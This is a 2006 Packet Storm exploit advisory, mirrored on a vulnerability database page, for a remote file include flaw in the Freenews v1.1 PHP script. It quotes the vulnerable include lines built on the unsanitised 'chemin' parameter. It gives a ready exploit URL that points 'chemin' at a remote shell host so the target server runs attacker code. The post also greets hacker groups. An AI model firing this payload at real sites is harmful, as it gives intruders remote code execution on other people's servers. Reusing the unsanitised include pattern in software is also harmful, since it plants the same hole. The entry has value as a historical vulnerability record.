Search...

freenews11-rfi.txt

2006-10-09T00:00:00

ID PACKETSTORM:50734
Type packetstorm
Reporter XORON
Modified 2006-10-09T00:00:00

Description

                                        
                                            `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
Freenews v1.1 &lt;= (chemin) Remote File Include Vulnerability  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
Discovered by XORON(turkish hacker)  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
URL:  
http://membres.lycos.fr/fdproweb/fdproweb/php_scripts/freenews1_1.zip  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
CODE:  
  
include ("$chemin/moteur/moteur_form.php");  
include ("$chemin/moteur/moteur_tab_results.php");  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
Exploit:  
  
http://www.hedef.com/[freenews_path]/moteur/moteur.php?chemin=http://sh3LL?  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
Thanx: str0ke, Preddy, Ironfist, Stansar, SHiKaA, O.G,DJR  
  
www.cyber-warrior.org  
www.team-rootshell.com  
irc.milw0rm.com #rootshell  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:50734", "type": "packetstorm", "bulletinFamily": "exploit", "title": "freenews11-rfi.txt", "description": "", "published": "2006-10-09T00:00:00", "modified": "2006-10-09T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/50734/freenews11-rfi.txt.html", "reporter": "XORON", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:28:25", "viewCount": 1, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2016-11-03T10:28:25", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:28:25", "rev": 2}, "vulnersScore": -0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/50734/freenews11-rfi.txt", "sourceData": "`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= \n \nFreenews v1.1 <= (chemin) Remote File Include Vulnerability \n \n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= \n \nDiscovered by XORON(turkish hacker) \n \n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= \n \nURL: \nhttp://membres.lycos.fr/fdproweb/fdproweb/php_scripts/freenews1_1.zip \n \n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= \n \nCODE: \n \ninclude (\"$chemin/moteur/moteur_form.php\"); \ninclude (\"$chemin/moteur/moteur_tab_results.php\"); \n \n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= \n \nExploit: \n \nhttp://www.hedef.com/[freenews_path]/moteur/moteur.php?chemin=http://sh3LL? \n \n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= \n \nThanx: str0ke, Preddy, Ironfist, Stansar, SHiKaA, O.G,DJR \n \nwww.cyber-warrior.org \nwww.team-rootshell.com \nirc.milw0rm.com #rootshell \n \n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}}